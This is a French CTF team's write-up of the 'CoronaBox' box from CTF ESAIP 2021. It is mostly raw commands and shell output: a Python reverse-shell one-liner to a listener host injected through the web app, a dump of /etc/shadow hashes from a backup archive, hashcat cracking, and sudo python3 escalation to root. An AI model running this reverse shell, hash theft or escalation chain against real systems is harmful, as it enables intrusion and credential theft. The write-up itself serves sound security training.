CTF ESAIP 2021 — Box Write-up : CoronaBox

CTF ESAIP 2021
Scoreboard

CoronaBox

L’application web Corovid
Exemple d’une requête effectuée pour rafraîchir le nombre affiché
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.255.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Utilisation de CyberChef pour l’encodage
Utilisation de la console javascript du navigateur pour modifier la commande qui va être signée
Connection from 192.168.99.100:59360 
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pfizer
python3 -c 'import pty; pty.spawn("/bin/sh")'
root:x:0:0:root:/root:/bin/bash
pfizer:x:1000:1000::/home/pfizer:/bin/sh astrazeneca:x:1001:1001::/home/astrazeneca:/bin/sh
$ ls -al /srv 
ls -al /srv
total 12
drwxr-xr-x 1 root root 4096 May 29 17:29 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 root pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
$ cp /srv/.bckp_2021-05-23_21:01.zip /tmp
cp /srv/.bckp_2021-05-23_21:01.zip /tmp
$ unzip .bckp_2021-05-23_21:01.zip
unzip .bckp_2021-05-23_21:01.zip
Archive: .bckp_2021-05-23_21:01.zip
inflating: etc/shadow
$ ls -al
ls -al
total 24
drwxrwxrwt 1 root root 4096 May 29 17:30 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 pfizer pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
-rw-r--r-- 1 root root 12 May 29 17:30 .corovid_value.txt
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 etc
$ ls -al etc
ls -al etc
total 16
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 .
drwxrwxrwt 1 root root 4096 May 29 17:31 ..
-rw-r----- 1 pfizer pfizer 877 May 23 21:01 shadow
$ cat etc/shadow
cat etc/shadow
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0:18770:0:99999:7:::
daemon:*:18733:0:99999:7:::
bin:*:18733:0:99999:7:::
sys:*:18733:0:99999:7:::
sync:*:18733:0:99999:7:::
games:*:18733:0:99999:7:::
man:*:18733:0:99999:7:::
lp:*:18733:0:99999:7:::
mail:*:18733:0:99999:7:::
news:*:18733:0:99999:7:::
uucp:*:18733:0:99999:7:::
proxy:*:18733:0:99999:7:::
www-data:*:18733:0:99999:7:::
backup:*:18733:0:99999:7:::
list:*:18733:0:99999:7:::
irc:*:18733:0:99999:7:::
gnats:*:18733:0:99999:7:::
nobody:*:18733:0:99999:7:::
_apt:*:18733:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/:18770:0:99999:7:::
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:18770:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0
hashcat -m 1800 -a 0 ./hashes ./rockyou.txt -O
$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:monsauveur
$ su astrazeneca
su astrazeneca
Password: monsauveur
$ sudo -l
sudo -l
Matching Defaults entries for astrazeneca on 1a37df71d186:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User astrazeneca may run the following commands on 1a37df71d186:
(ALL : ALL) NOPASSWD: /usr/bin/python3
$ sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python3 -c 'import os; os.system("/bin/sh")'
# whoami
whoami
root
# cat /root/flag.txt
cat /root/flag.txt
CTF{V@cc!nezVous@h@h}

--

--

--

French CTF team

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Les Pires Hat

Les Pires Hat

French CTF team

More from Medium

VulnHub PumkinGarden CTF Walkthrough

log4shell 0-day Exploit in log4j v2 — What it is?

log4shell 0-day Exploit in log4j v2 - What it is? How to Identify and Mitigate the Vulnerability (CVE-2021-44228)

XXE - TryHackMe Walkthrough

Pickle Rick TryHackMe CTF Writeup